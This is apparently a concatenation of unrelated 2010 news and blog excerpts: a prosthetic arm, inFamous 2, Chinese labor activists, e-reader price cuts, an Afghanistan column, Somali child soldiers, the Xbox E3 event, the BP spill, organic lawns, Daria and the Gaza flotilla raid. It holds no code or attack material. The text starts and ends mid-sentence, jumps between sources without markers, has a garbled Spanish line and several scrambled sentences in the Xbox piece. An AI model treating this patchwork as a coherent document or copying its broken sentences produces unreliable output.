that Santa Rosa is doing something to change that — to show kids that
independence and connection to a larger world do n’t have to depend on a
personal motor vehicle .
More from around the network : Discovering
Urbanism on learning from the early family - friendly suburbs .
The
Transport Politic on how to make transit commuting more
interesting .
And Newton
Streets and Sidewalks on ticketing bicyclists who break the law .
Robotics and prosthetics designers have been making great advances in the power , sensitivity and humanity of their creations .
Case in point :
The i-Limb Pulse is a new bionic arm that allows users to handle heavy objects or delicate items , as well as customize the grips to fit their needs .
With a design similar to Darth Vader ’s bionic hand , this is one tough prosthetic device .
The maker , Touch Bionics , claims this prosthetic hand can handle more than 200 pounds , if your biceps are up to it .
When grabbing an object , it can apply additional force by using a pulsing effect .
" This effect is generated by sending rapid , high - frequency electronic pulses to the finger motors , driving them to close more securely around an object , " the company explains on its website .
The i-Limb Pulse is customizable with software .
Doctors and users can tweak i- Limb Pulse ’s behavior , programming it with specific grip patterns to fit the customer 's needs .
They then beam the new patterns to the hand with Bluetooth .
It comes in two sizes , to accommodate both genders .
But a number of details have not been disclosed , including the price and artificial - skin options , which were available for the previous model .
Which , by the way , was n’t exactly shabby .
The I - Limb Hand was the first fully - functional artificial hand commercially available to people who needed a hand , according to Touch Bionics .
Time magazine named it one of top 50 inventions of 2008 ( to be fair , that list also included Dimitrij Ovtcharov ’s new ping - pong serve ) .
According to Touch Bionics , i- Limb Hand has been fitted to more than 1,200 patients .
We 're not sure the same amount of commercial success will follow another interesting robotic arm concept that hit us in the past few days : an arm modeled after an elephant 's trunk .
Although its name includes the word " bionic , " the Bionic Handling Assistant is more of an industrial - level robotics device – and still not available for sale – but the makers , Festo , say it will offer a safe and flexible way to move stuff around .
Because contact between humans and current industrial robots can be hazardous , BHA ’s human - friendly trunk retracts on contact ( or so the company claims ) .
As such , it would be a safer way to transfer things in hospitals or at home .
The idea of a robotic arm that looks like a trunk so it does n't violently murder you might sound silly .
But a recent study by three German scientists showed that robotic arms could , in fact , violently murder you .
( Photo : Touch Bionics )
Uncharted 2's visuals were stunning - so stunning , in fact , that you 'd think it would be impossible for a developer to create an open world game that matched Naughty Dog 's effort .
But that 's exactly what fellow PS3 - exclusive developer Sucker Punch is aiming for with inFamous 2 .
Indeed the game , which sees super - powered Cole McGrath parkour his way around the fictional city of New Marais , is being influenced by Naughty Dog 's spiffing blockbuster .
" We 're getting a lot closer to it - we certainly are - and we 've got a ways to go , " Sucker Punch development director Chris Zimmerman told VideoGamer.com at E310 last week .
" Clearly they are the inspiration for us .
And not just in terms of the visuals , but all the things they did that made that game so great .
We 're working hard to get as close as we can to that goal , and I think we 're going to get pretty close .
People will look at it and I think that they 'll say , look , you know this is in the same ball park . "
We got a chance to go hands - on with inFamous 2 during a behind - closed doors presentation at the show , and we can confirm that it indeed does look great for an open world game - and a marked improvement on the two million - selling original .
Zimmerman puts the jump in quality of presentation down to Sucker Punch being a PS3 - exclusive developer .
" The thing that we 've got going for us , like the Uncharted guys , we 're Sony only .
All we do is games for the PS3 , which means that the engine that we 're building can be completely tuned and targeted at the PS3 and at the things the PS3 does well .
" We can commit to doing all our systems in a very PS3 specific way .
We can write SPU code for everything .
As a result , we 're able to do more .
We 're able to take more advantage of the hardware , because it 's the only system we have to worry about .
Just like Uncharted , we 're able to do things that we would never be able to do if we were doing a cross - platform game .
" For instance , we moved most of our lighting on the SPUs for this game .
So , casting light on the objects was all dynamic for us - completely dynamically lit .
We did it on the graphics card , which was the traditional place to do it before .
But we could move it to the SPUs , and so we did .
And as a result we 're able to do more stuff with the graphics chip .
We can put more triangles on screen .
We can have more detail .
We can have more characters .
We can have more everything .
We were able to do that only because we knew we were going to be doing a PS3 game , and that 's all we were going to be worrying about . "
Zimmerman is n't the only one at Sucker Punch who reckons the PS3 is great .
Co-founder Brian Fleming described the console 's SPUs as " monsters " in an interview with VideoGamer.com from E310 .
Fingers crossed inFamous 2 ends up looking the business .
The game 's out next year .
Analysts say they were smart to change .
“ QQ offers no protection from eavesdropping by the Chinese authorities , and it is just as well they stopped using it , ” said Rebecca MacKinnon , a China specialist and fellow at the Center for Information Technology Policy at Princeton University .
“ QQ is not secure .
You might as well be sharing your information with the Public Security Bureau . ”
But the activists say they are getting around some of those restraints by shifting to different platforms ( including a Skype - like network called YY Voice ) and using code words to discuss protest gatherings .
For years , labor activists have been exposing the harsh working conditions in Chinese factories by smuggling cellphone images and video out of coastal factories and posting documents showing labor law violations on the Web .
New and notable is that these formerly covert activities have become open and pervasive .
Last month , for example , when a string of puzzling suicides was reported at Foxconn Technology near here , one of the world ’s largest electronics manufacturers , there were online video postings reportedly showing security guards manhandling workers .
And several people claiming to be Foxconn workers posted their pay stubs online showing that their overtime hours exceeded the legal monthly limit .
In Zhongshan , where many of the Honda Lock strikers returned to work at least temporarily on Sunday and Monday while wage negotiations continued , the workers followed a basic model established by those who went on strike last month at a Honda transmission factory in the city of Foshan .
The Foshan strike leaders organized and communicated with more than 600 workers by , among other means , setting up Internet chat rooms on QQ .
“ I created one myself the night before the strike , and that had 40 people , ” said Xiao Lang , one of the two Honda strike leaders in Foshan .
Mr. Xiao was fired by Honda soon after leading the walkout .
“ We discussed all kinds of things on it , ” he said of the QQ chat room , “ such as when to meet , when to walk out and how much pay we want . ”
El instituto contratar� a 180 mil personas , de las cuales 106 mil ser�n encuestadoras ; los resultados preliminares del censo se dar�n a conocer en diciembre pr�ximo
CIUDAD DE M�XICO | Viernes 21 de mayo de 2010
NTX | El Universal
16:51
I have plenty of long haul experience and echo most of JCG 's advice .
Noise cancelling headphones - without something playing - are probably the biggest help to me .
Not being climbed over is important but there is often concealed strip lighting along the walls so window seats are often brighter than the rest of the cabin .
On a twin aisle plane you may well find that a middle seat in the centre block is darker .
I usually try to eat a good meal before boarding , with a couple of drinks , so that my napping reflex kicks in as the plane gets airborne .
Briefing the crew will not always work , I was once woken by a solicitous stewardness worried that I might starve ( on an 8 hour flight ! ) .
Some airlines use stickers to warn crew what passengers wishes are , if they do , make sure that you get one .
In economy , even if you are not eating you may be asked to put your seat upright so that the passenger behind is able to .
I have been woken up for this ( and was not happy ) .
Consider booking the rearmost seat in a cabin section : the plus is that there is no one behind you so can recline without affecting others but the downside is that recline angle may be restricted .
Also , avoid toilet areas ( can be another reason for avoiding last row ) as people tend to gather around them , especially at the end of overnight flights .
Ca n't sleep on a plane ?
Take a day flight instead .
Outbound use the time to prepare for your meeting , conference , whatever .
Inbound write up your notes , follow up plan , catch up on your email , etc .
Borders Battles On Kobo E- Reader Price Cuts
Responding to Amazon Kindle and Barnes & Noble Nook price cuts , Borders is including a $ 20 gift card and credit toward future purchases .
Borders has responded to electronic - reader price cuts from rivals Amazon and Barnes & Noble by bundling a $ 20 gift card with its Kobo e-reader .
Borders announced the offer on Tuesday , a day after Amazon and B&N said they would drop the price of their devices 27 % and 23 % , respectively .
Besides the gift card , Borders its offering Kobo buyers double " Borders Bucks , " which amounts to a $ 10 credit toward a future purchase from the bookseller .
While Borders 's offer is less dramatic than competitors , it marks the latest volley in a price war among the three booksellers , who appear to be adopting a strategy of getting their e-readers to as many people as possible in order to see more digital books .
A fourth major e-reader seller , Sony , has yet to respond to the latest price cuts .
Amazon lowered the price of its standard Kindle to $ 189 just hours after B&N announced that it would sell the Nook 3G for $ 199 .
Both e-readers had sold for $ 259 .
Amazon did not change the price of its larger Kindle DX , which still sells for $ 489 .
The price cuts are not unexpected .
Analysts have said for quite awhile that the growing number of e-readers in the market , and increasing competition from tablet - style computers , such as Apple 's iPad , would eventually drive prices down .
Indeed , in announcing the gift card , Borders said research has identified the " consumer sweet spot " for e-readers between $ 100 and $ 150 .
Borders sells the Kobo for $ 150 , but does not offer a Wi-Fi or 3G wireless connection for buying and downloading e-books .
Instead , books must be purchased through a PC or Mac and transferred to the e-reader .
The same is true for Sony 's $ 200 Reader Touch .
Amazon 's Kindle and B&N's Nook offer both wireless connections , making it much easier for customers to buy e-books from the respective bookseller .
We welcome your comments on this topic on our social media channels , or [ contact us directly ] with questions about the site .
“ General Petraeus is a military man constantly at war with the facts , ” began the MoveOn.org attack ad against Gen.
David Petraeus back in 2007 , after he had delivered a report to Congress on the status of the war in Iraq .
George W. Bush was president , and MoveOn was accusing Petraeus of “ cooking the books for the White House . ”
The campaign asked “ General Petraeus or General Betray Us ? ” on a full - page ad in The Washington Post .
MoveOn took tremendous heat for the campaign , but stood its ground .
Three years later , Barack Obama is president , Petraeus has become his man in Afghanistan , and MoveOn pulls the critical Web content .
Why ?
Because Bush ’s first war , Afghanistan , has become Obama ’s war , a quagmire .
The U.S. will eventually negotiate its withdrawal from Afghanistan .
The only difference between now and then will be the number of dead , on all sides , and the amount of ( borrowed ) money that will be spent .
Petraeus ’ confirmation to become the military commander in Afghanistan was never in question .
He replaces Gen. Stanley McChrystal , who resigned shortly after his macho criticisms of his civilian leadership became public in a recent Rolling Stone magazine article .
The statistics for Afghanistan , Obama ’s Vietnam , are surging .
June , with at least 100 U.S. deaths , is the highest number reported since the invasion in 2001 .
2010 is on pace to be the year with the highest U.S. fatalities .
Similar fates have befallen soldiers from the other , so - called coalition countries .
Petraeus is becoming commander not only of the U.S. military in Afghanistan , but of all forces , as the invasion and occupation of Afghanistan is run by NATO .
U.S. troops , expected to rise to 98,000 this year , far outnumber those from other nations .
Public and political support in many of those countries is waning .
Journalist Michael Hastings , who wrote the Rolling Stone piece , was in Paris with McChrystal to profile him .
What did n’t get as much attention was Hastings ’ description of why McChrystal was there :
“ He ’s in France to sell his new war strategy to our NATO allies — to keep up the fiction , in essence , that we actually have allies .
Since McChrystal took over a year ago , the Afghan war has become the exclusive property of the United States .
Opposition to the war has already toppled the Dutch government , forced the resignation of Germany ’s president and sparked both Canada and the Netherlands to announce the withdrawal of their 4,500 troops .
McChrystal is in Paris to keep the French , who have lost more than 40 soldiers in Afghanistan , from going all wobbly on him . ”
The whistle - blower website WikiLeaks.org , which received international attention after releasing leaked video from a U.S. attack helicopter showing the indiscriminate slaughter of civilians and a Reuters cameraman and his driver in Baghdad , has just posted a confidential CIA memo detailing possible public relations strategies to counter waning public support for the Afghan War .
The agency memo reads : “ If domestic politics forces the Dutch to depart , politicians elsewhere might cite a precedent for ‘ listening to the voters . ’
French and German leaders have over the past two years taken steps to preempt an upsurge of opposition but their vulnerability may be higher now . ”
I just returned from Toronto , covering the G - 20 summit and the protests .
The gathered leaders pledged , among other things , to reduce government deficits by 50 percent by 2013 .
In the U.S. , that means cutting $ 800 billion , or about 20 percent of the budget .
Two Nobel Prize - winning economists have weighed in with grave predictions .
Joseph Stiglitz said , “ There are many cases where these kinds of austerity measures have led to … recessions into depressions . ”
And Paul Krugman wrote : “ Who will pay the price for this triumph of orthodoxy ?
The answer is , tens of millions of unemployed workers , many of whom will go jobless for years , and some of whom will never work again . ”
In order to make the cuts promised , Obama would have to raise taxes and cut social programs such as Social Security and Medicare .
Or he could cut the war budget .
I say “ war budget ” because it is not to be confused with a defense budget .
Cities and states across the country are facing devastating budget crises .
Pensions are being wiped out .
Foreclosures are continuing at record levels .
A true defense budget would shore up our schools , our roads , our towns , our social safety net .
The U.S. House of Representatives is under pressure to pass a $ 33 billion Afghan War supplemental this week .
We ca n’t afford war .
Denis Moynihan contributed research to this column .
Amy Goodman is the host of “ Democracy Now ! , ” a daily international TV / radio news hour airing on more than 800 stations in North America .
She is the author of “ Breaking the Sound Barrier , ” recently released in paperback and now a New York Times best - seller .
© 2010 Amy Goodman
Distributed by King Features Syndicate
HARGEISA , Somalia 
As the United Nations Security Council expressed a “ deep concern ” on Wednesday over the continued use of child soldiers and a “ readiness ” to adopt sanctions against individuals who deploy them , an American lawmaker warned that the United States might have broken several laws by providing assistance to the Somali military , which uses children in conflict .
The United Nations lists the Somali government as one of the “ most persistent violators ” in the world of using child soldiers , and this week The New York Times documented several child soldiers , some as young as 12 , toting assault rifles and working for the Somali transitional government in Mogadishu , Somalia ’s capital .
While the American government has expressed concern about the matter , it has given the Somali military millions of dollars in arms and paid soldiers ’ salaries .
On Wednesday , Senator Richard J. Durbin , Democrat of Illinois , said that assistance might violate the Child Soldier Prevention provision of the Trafficking Victims Protection Reauthorization Act of 2008 ; the Durbin - Coburn Child Soldiers Accountability Act ; and the Durbin - Coburn Human Rights Enforcement Act .
“ I recognize that the Somali Transitional Federal Government is trying to bring some measure of stability to that war - torn country , ” he wrote in a letter to Secretary of State Hillary Rodham Clinton dated June 16 .
“ However , it should not do so on the backs of its precious children , and certainly not with the help of the American taxpayer . ”
It ’s been a tough year for Silicon Valley ’s fabulously paid CEOs .
Their 2009 compensation was down nearly 5 percent , which , recession or no , can really put a crimp in your style .
Even Oracle ’s Larry Ellison , who as in all things did better than most , saw his annual pay refuse to budge past last year ’s level : $ 84.5 million .
What ’s a mogul to do ?
The 155 CEOs on the Mercury News ’ annual What the Boss Makes survey ( total 2009 compensation : $ 579 million ) can no doubt look ahead to better days .
Corporate profits in the valley are up .
And hey , even if the bosses get canned , they ’re likely to leave with millions in severance .
But the newspaper ’s yearly exercise of flipping through the big shots ’ financials with the help of research firm Equilar got me thinking about the rest of us .
What are the rest of us making ?
How are we doing ?
What sort of days do we have to look forward to ?
Statistically , you could argue that we did better than the bosses , though direct comparisons are hard to draw .
According to Joint Venture : Silicon Valley
Network ’s most recent economic index , our per capita income declined just under 3 percent in 2009 .
Take that , CEOs .
Of course , the per capita figure was $ 62,000 in 2009 , about what Larry Ellison made every 61/2 hours that year .
And the truth is , the past decade has been unkind to those of us who answer to those in the corporate suite , rather than sit in it .
“ When the dot - com bust occurred , ” says Cindy Chavez , executive director of the labor - aligned Working Partnerships USA , “ we started down a trajectory that has n’t quite changed for us .
We have a lot of people in our community who have been underemployed for a very long time , or unemployed . ”
It ’s true .
Employment in the valley is lagging below 1999 levels .
More than 246,000 Silicon Valley jobs have disappeared since the beginning of the decade .
And while the figure reflects jobs lost , it ’s the people who lost the jobs that are feeling the pain .
The early 2000s seem like a blur of second jobs , fallback jobs and no jobs at all .
Between 2000 and 2008 , median household income in the valley dropped by more than 6 percent , according to Joint Venture : Silicon Valley Network ’s most recent regional index .
( Find it at www.jointventure.org.)
In the boom days the valley seemed like a place where the rich got richer and those who worked for them did pretty well , too .
But now the valley ’s narrative seems a little more muddled , a little less aspirational .
Santa Clara County ’s unemployment rate stands at 11.4 percent .
If the valley ’s condition is anything like the rest of the state ’s , more than 40 percent of the unemployed have been out of work for more than six months .
More and more valley workers are striking out on their own as contractors or sole business proprietors , a trend that could reflect an entrepreneurial spirit , or maybe a certain desperation among the unemployed .
Tracey Grose , a researcher who worked on Joint Venture ’s index , says the increase in the self - employed illustrates the changing nature of work in the valley .
“ It is becoming more tenuous as more and more people seem to be working independently as contractors , ” says Grose , of Collaborative Economics in Mountain View .
“ That means they do n’t have benefits and it ’s definitely less secure going from contract to contract . ”
No doubt , life is getting harder for plenty .
Chavez ’s outfit recently released “ Life in the Valley Economy 2010 , ” a report ( find it at www.wpusa.org) that includes statistics showing lower - paying jobs are replacing higher - paying jobs , that a significant number of valley workers do n’t make enough to support a family of four and that the valley ’s middle class is shrinking .
Chavez says it ’s understandable that executives who take risks by building companies are well - paid .
But she says that while all the rewarding is going on we must also recognize the importance of the middle class and put in place practices and policies that ensure a decent living for the valley ’s workers .
Good point .
After all , we ’re all in this together .
Are n’t we ?
Contact Mike Cassidy at mcassidy@mercurynews.com or 408-920-5536 .
Follow him at Twitter.com / mikecassidy .
China appears to be making moves that several folks had been fearing for some time :
It is considering stricter limits on the export of so - called rare - earth metals .
The metals , which are most abundant in China , are used in a range of high tech industries including green energy and defense , which is what most concerns the US government .
Claiming that the mining of rare earths has been bad for the environment , the government is moving to restrict unauthorized wells , which may be exporting their goods illegally at too - low prices , according to NYT .
This move will surely be good news for the one major domestic player , Molycorp , which is based in California , and has IPO plans .
Any restrictions coming out of China can only mean an easier time with regulations , and more subsidies , especially given the defense implications .
We 've put together a presentation on what you need to know about rare earths .
The first part is a presentation from Avalon Rare Metals , explaining what they 're all about , and the second lists key countries to pay attention to .
Microsoft marked the unofficial kick off of E3 2010 Monday morning with its Xbox Media Event at the Wiltern Theater in downtown Los Angeles , whose highlight was the launch of the anticipated " slim " version of the Xbox 360 .
Microsoft marked the unofficial kick off of E3 2010 Monday morning with its Xbox Media Event at the Wiltern Theater in downtown Los Angeles , whose highlight was the launch of the .
The event follows of a Cirque du Soleil - themed party held by the company Sunday night , in which Project Natal the unveiled at last year 's show was .
The Kinect once again took center stage at Monday 's event , along with a brand new bit of hardware in the form of a slimmed down Xbox 360 .
Before delving too far into hardware , however , Microsoft showcased a handful of Xbox 360 titles , including the latest installments of such popular franchises as " Halo , " " Call of Duty , " " Gears of War , " " Metal Gear Solid , " and " Fable " .
" Call of Duty : Black Ops " was first up .
The first - person shooter is set to arrive on the Xbox 360 in November of this year .
Mark Lamia of gaming studio Treyarch also announced that , while the game will not be exclusive to Microsoft 's console , all map packs and add - ons for " Call of Duty " will appear on the Xbox 360 first through 2012 .
" Metal Gear Solid : Rising " producer Shigenobu Matsuyama ( the protégé of " Metal Gear " creator Hideo Kojima ) then appeared to showcase the latest addition to the popular series , demoing the protagonist Raiden 's in - game ability to slice through objects as diverse as watermelons and cars with a sword .
A number of Xbox 360 - only games took the stage next , including " Gears of War III , " " Fable III " ( shipping in October ) , and a new title , " Codename : Kingdom " .
Bungie director Marcus Lheto announced the latest addition to the " Halo " franchise , " Halo : Reach " .
He called the squad - based sequel , which ships in September , " the most ambitious game Bungie has created . "
Next up , Microsoft showcased new Xbox Live features utilizing the new Kinect controller .
The device 's built - in multi-array mic allows users to control programming on the Xbox Live using either voice commands ( such as " Xbox : play , " ) or gestures , without the aid of a headset .
Users can control video and music playback via the new simplified Zune interface , and both live and video - on - demand offerings from Xbox Live 's new partner , ESPN .
The deal with the cable sports network brings content from college football , college basketball , the MLB , NBA , and professional soccer to the console .
The content includes 3,500 live sporting events , all of which are free for Xbox Live Gold members .
The face of Microsoft Kinect , Kudo Tsunoda , took the stage next to showcase a handful of new games designed for the new Kinect hardware .
" We 've been talking about this for a year now , " he told the audience , " and the time for talk is over . "
" Kinectimals , " which made its public debut at last night 's event , allows the player to interact with a virtual animal , executing " 30 unique activities , " Tsunoda said .
" Kinect Sports " takes advance of the device 's full body capture for mini games , including bowling , ping - pong , soccer , and boxing .
" Kinect Joy Ride " is a light - hearted kart racing game , while " Kinect Adventures " features simulated outdoor activities like river rafting .
A number of non-Microsoft Kinect games made their debut as well , including Ubisoft 's exercise title " Your Shape : Fitness Evolved , " " Harmonix 's Dance Central , " and a LucasArts " Star Wars " game that will launch next year .
The Kinect itself is launching this November with 15 games .
Pricing has yet to be announced .
Microsoft had one final surprise up its sleeve  or , rather , beneath a fake white Xbox .
A new sleeker , " whisper - quiet " and black version of the console made its debut at the event .
The console features built - in 802.11n networking and a 250 GB hard drive .
It ships this week for $ 299 , which includes an Xbox 360 wireless controller , Xbox 360 headset , HDMI input , USB flash drive storage capabilities and more , and a one - year limited warranty .
With the announcement of the slim Xbox 360 , one of the can also be confirmed as true .
By Branko Collin
Spanish artist Maider López is organising a football tournament on September 3 and is looking for both participants and an audience .
The tournament called Polder Cup will take place on the pastures of Ottoland in South Holland , halfway between Utrecht and Rotterdam .
Contestants will be given food , drink and swag all for coming out to the middle of nowhere ( using the charter bus of the project ) and having their picture taken .
What ’s the catch ?
Is there a catch ?
There is always a catch !
As you can see in the photo , the pitches will be drawn across drainage ditches , and the players are expected to come up with their own rules and methods for dealing with these hazards .
If you want to know beforehand how to fish a ball from a brook , check out Hans van der Meer ’s photo book on Dutch football pitches .
As for crossing ditches , see here .
( Link : Bright .
Photo : poldercup.nl . )
This entry was posted on Tuesday , June 1st , 2010 at 8:35 am and is filed under Art , Nature , Sports .
You can follow any responses to this entry through the RSS 2.0 feed .
You can leave a response , or trackback from your own site .
Little by little , the most apocalyptic oil scenarios are becoming more realistic .
Congressman Ed Markey has released an internal BP doc that shows that under certain scenarios , the flow from the leaking wellhead could hit 200K .
Today Representative Ed Markey ( D - Mass . ) released an internal BP document showing that the company 's own analysis believed that a worst - case scenario , based on damage to the well bore , could result in 100,000 barrels of oil per day .
In the document , BP stated : If BOP and wellhead are removed and if we have incorrectly modeled the restrictions – the rate could be as high as ~ 100,000 barrels per day up the casing or 55,000 barrels per day up the annulus ( low probability worst cases )
To read the document , CLICK HERE .
This number is in sharp contrast to BP ’s initial claim that the leak was just 1,000 barrels a day .
At the time this document was made available to Congress , BP claimed the leak was 5,000 barrels a day , and told Members of the House Energy and Commerce Committee that the worst case scenario was be 60,000 barrels a day .
This document tells a different story .
The two pages from the doucmnet are shown below .
Lush green .
That 's the way Jane Witmer describes the lawn around her Seattle house .
But if you look closely , there 's some moss and some clover .
" Wildflowers are beginning to bloom pink in the grass , " she said .
The small imperfections are the price she pays for keeping her lawn organic .
" It 's better for my health , and the health of my pets and my family , " Ms. Witmer said .
" It 's better for the health of the bugs and the birds in the yard . "
Increasing numbers of homeowners are eschewing lawn chemicals , citing environmental and health concerns .
A 2008 survey by the National Gardening Association indicated that about 12 million households were using only natural products on lawns and gardens , up from about 5 million in 2004 .
Bruce Butterfield , market research director for the association , said the number of organic gardeners is likely to increase , to a point .
" It 's not going to totally displace use of conventional fertilizers for lawn care , " he said .
" Part of it is the whole image of the way people see their lawns , " he said .
They 're not going to get the country club or golf course look if they use only natural fertilizers .
At Scotts Miracle - Gro Co. , organic products account for about 5 percent of overall sales of consumer lawn and garden products , according to Lance Latham , director of public affairs .
" In general , consumers will find the cost of organic fertilizers to be a little more than the price of conventional products , " he said .
Going organic requires a bit of tolerance for weeds
People who choose to go organic might have to lower their expectations a bit , and be patient , the experts say .
" Organic approaches are not going to deliver the same pest control as chemicals , " said Mike Goatley , extension turf grass specialist at Virginia Tech in Blacksburg .
Still , organic does n't mean ugly , said Paul Tukey , founder of safelawns.org and author of " The Organic Lawn Care Manual . "
" You can have a gorgeous lush green lawn going naturally . "
Just learn to tolerate some weeds .
Emily Bishton , a garden consultant and designer in Seattle , said she tries to get her clients at Green Light Gardening to envision what a natural grassland is like .
" The main thing that really needs to shift in terms of the way that you approach your lawn is that what you are striving for is how to make my grass as healthy as possible , rather than how do I get rid of these weeds , " she said .
Weeds can help diagnose what 's wrong with a lawn .
" Some weeds tell you your lawn is acidic , " said Tukey .
" Some weeds tell you your lawn is compacted .
Some weeds tell you it 's too wet . "
Clover can be a sign the lawn needs nitrogen .
Tukey calls clover " Mother Nature 's fertilization factory . "
In the middle of the 20th century , most grass seed was mixed with clover , which provides needed nitrogen to the soil , according to Goatley .
" We 're coming full circle , " he said .
" It makes perfect sense going in to fix the nitrogen . "
Start with healthy soil
Good soil is the first step to a healthy lawn — organic or not .
Conduct a soil test , Goatley advised .
" You 've got to know what you 're working with . "
You can do that through your local lawn and garden center or through state agriculture extension service programs .
Among the things you 'll want to know : how much organic matter is in the lawn , the levels of such things as nitrogen , phosphorous and calcium , and the pH to determine if the soil is too acidic .
A good pH to promote turf growth is generally considered to be between 6.5 and 7 , Butterfield said .
The centers can give you advice on how to achieve the proper levels .
You 'll also want to make sure your soil is properly aerated .
Aerating a lawn provides room for roots to grow and allows it to hold water better .
Earthworms do the aeration naturally .
So does plantain .
But if your lawn needs more help , there are aerating machines that you can buy or rent .
Goatley recommends doing the aeration when the soil is moist .
To promote good growth , he said , soil should be about 50 percent solid material , 25 percent water and 25 percent pore space .
A layer of compost helps give soil the ingredients it needs to provide a healthy environment for grass .
Goatley recommends applying compost at a a depth of one - quarter inch once or twice a year .
For an organic fertilizer , some suggest corn gluten .
However , using it in an urban area with rodents can be a problem , cautions Sandy Bandier , environmental and natural resources extension agent for the District of Columbia .
Corn gluten can be feed for rats .
For many , the choice of going organic or synthetic does n't have to be all or nothing .
Some argue that if you are careful about using conventional fertilizers , they are n't all bad .
" It 's not a black and white picture , " Butterfield said .
Besides , only about half of US households fertilize their lawn at all , he added .
" They figure it 's God 's responsibility to make it look good . "
-----
Editor 's note :
To read more about gardening , see the Monitor 's main gardening page and our lively gardening blog , Diggin '
It .
" Fashion " is a pretty broad term , but , like all things in life , its different sides can be accurately represented in possibly the greatest television show of all time , Daria .
Advertisement
Fashion , this ... thing , on which I spend so much time , and brain power , and ( sigh ) money , has a pretty bad rap .
But I 'm going to make this post my go - to link when I attempt at replying to " WHY DO YOU CARE ABOUT FASHION IT'S SO STOOPID " emails and set a few things straight right here , with polar opposite sisters Daria and Quinn Morgendorffer as my examples .
Quinn is vice president of her school 's Fashion Club , which is actually a pathetic clique made up of her and three of her also shallow friends .
A magazine called Waif serves as their life guide and they meet on a regular basis to discuss topics like when chartreuse will be back " in " and the sin that is clogs .
" Who would 've thought that being overdressed could be a bad thing ? "
Quinn once pondered after her camping accessories proved to be more novelty than practical in a blizzard .
Advertisement
Fashion , for Quinn , is about people liking and envying you .
Quinn 's fashion is about popularity and conventional beauty .
Quinn 's fashion is fashion we see in " women 's " magazines and on reality TV and TV that is n't reality but still tries to depict the reality of the fashion industry as the beauty school dropout dream sequence in Grease , with Frankie Avalon as some Gayngel giving advice about nose jobs and all the backup singers as giant singing shoes .
Quinn 's fashion is monogram bags as trophies and small talking at parties and everything that I hate about the industry — the beauty standards , the obsession with youth , the obsession with trends , the sexism , the fact that everyone gives a shit about who wore who where and where they sat and who their friends are and arrrfllarrgggbaagaagrrrb .
Quinn 's fashion is the impression of fashion that I think is most common , as it's the most mainstream and the one easiest to sell and write about and make suitable for gossip and drama .
And then there 's Daria 's fashion .
Daria hates fashion , probably the same way Yohji Yamamoto hates fashion .
And still , she has the coolest style ever , especially for a cartoon character that has to wear the same thing every day — an orange shirt , a dark green blazer , schoolgirl skirt , black tights , and combat boots .
It 's awesome because she does n't know it 's awesome — I would call it effortless , but that word has been abused by that contrived bedhead , shredded leather leggings look ( which Vogue US put a solid end to in the " Point of View " page in this month 's issue — THANK YOU . )
It 's like elderly women I saw gardening in alleyways when I went to Tokyo , or the kind of person who pops up on a street style blog and you can totally tell they do n't give a shit about where their clothes are from or the fact that people will write comments about their outfit online .
Daria does n't care what others think about her , and definitely not her appearance , and that is what , really , it 's all about .
It 's not about being what magazines want you to be ; it 's about the difficult act of being yourself , which , when it seems like the whole universe cares about appearance more than anything else , is a pretty courageous thing to do .
Earlier : Daria : A Love Letter From A Former Teen Nerd
An Open Letter To Heidi Montag From Quinn Morgendorffer
As Israel gets an international scolding for the deaths in a botched Israeli raid on the Gaza freedom flotilla that challenged Israel 's three - year blockade on the coastal strip , the government of Prime Minister Benjamin Netanyahu has come under a storm of criticism from Israelis themselves .
Though there was little sympathy for the nine activists killed and dozens injured in the clash on the Marmara passenger ship , Israelis are frustrated with their leaders for walking into what they say was a transparent " trap ' ' of confrontation with pro-Palestinian activists – and botching the mission .
" It ’s the military failure combined with the international damage .
Most people could live with that if it had been done successfully , '' says Tom Segev , a leading Israeli historian .
" It 's not that people are angry that people in Gaza are hungry .
It was an operation that was ill - conceived and did n't go well enough .
They hate when things go wrong . ''
In the heat of the frustration , there were signs of a possible political crisis for Mr. Netanyahu .
A front - page column in the centrist daily newspaper Maariv demanded the resignation of Defense Minister Ehud Barak .
In addition , a parliament member from the dovish Meretz Party called on the government to appoint an independent inquiry commission .
Meanwhile Egyptian President Hosni Mubarak , arguably Netanyahu 's strongest ally in the Arab world , lifted Egypt 's blockade on the Gaza Strip and allowed aid to be delivered through the Rafah crossing .
' We fell into a trap '
Public outrage after Israel 's botched war against Hezbollah forced the appointment of such a commission , and prompted popularity ratings for former Prime Minister Ehud Olmert to plummet .
As then , some Israelis today believe that political leaders relinquished power and decisionmaking ability to the military , says Asaf Meydani , a political science lecturer at the College of Tel Aviv and Jaffa .
" It was stupid on our part .
There was no way the mission could have been done properly .
It 's the government 's fault , I do n't blame the soldiers , " says Maureen Bassan , a retired English teacher .
" I do n't believe the activists were humanitarian .
They knew this was a way to get Israel to do a stupid thing , and I do n't like the fact that we fell into the trap . ''
Though Netanyahu and Barak visited wounded soldiers in Israeli hospitals to show a united front with army top brass who said the commandos acted properly , political leaders privately acknowledged that the storming of the boat went off script .
" It was a messy operation , '' says a senior Israeli official .
Israelis disturbed by video footage
Israelis said they were disturbed by black - and - white video footage , which the army says shows activists beating commandos with clubs and even casting one soldier over the side of a ship deck .
" It 's not the nicest feeling in the world ' ' to watch the video , says Tomer , a software engineer .
" Soldiers were coming down and [ activists ] were waiting to attack them .
It was bizarre that they went one after the other into the situation . ''
Beyond frustration with the lack of preparedness and the diplomatic defensive , there was speculation that the Jewish state had lost the moral high ground to Hamas in the Gaza standoff .
One columnist drew a comparison to the Exodus refugee ship in 1947 , whose mission to bring Holocaust survivors to the Holy Land was stopped by British forces in the Mediterranean .
The incident helped spur international opinion to end the British mandate in Palestinian and create a Jewish state .
" This is the Palestinian Exodus , " wrote Ari Shavit , a centrist political commentator , in Haaretz .
" In one threat of folly , the government of Israel succeeded in positioning [ Hamas ] as the victims and the Israeli Navy as an Navy of Evil . "
Some formed human shields , others fought back with makeshift weapons , while a few of the most vulnerable hid below deck and prayed for the violence and killing to stop .
But what united every survivor who spoke out today about yesterday 's pre-dawn assault by Israeli commandos on the pro-Palestinian aid flotilla to Gaza , was a sense of deep shock at the speed , aggression and lethal force of the Israeli response to what they reiterated was nothing more than a humanitarian aid effort .
Speaking on arrival back in Berlin , wrapped in an airline blanket from the Israeli national airline El Al , Norman Paech , a 72 - year - old German pro-Palestinian activist described waking up to hear " striking explosions " as the assault began on the Mavi Marmara , the flotilla 's informal flagship .
" I hurried up and dressed myself and colleagues said to me ' we 're under attack , the Israelis are here ' , " he said .
" The aggression came from the sky , from helicopters from which soldiers came down by ropes .
We waited in the fore room and saw them carrying an Israeli soldier who looked to me like he'd had a breakdown .
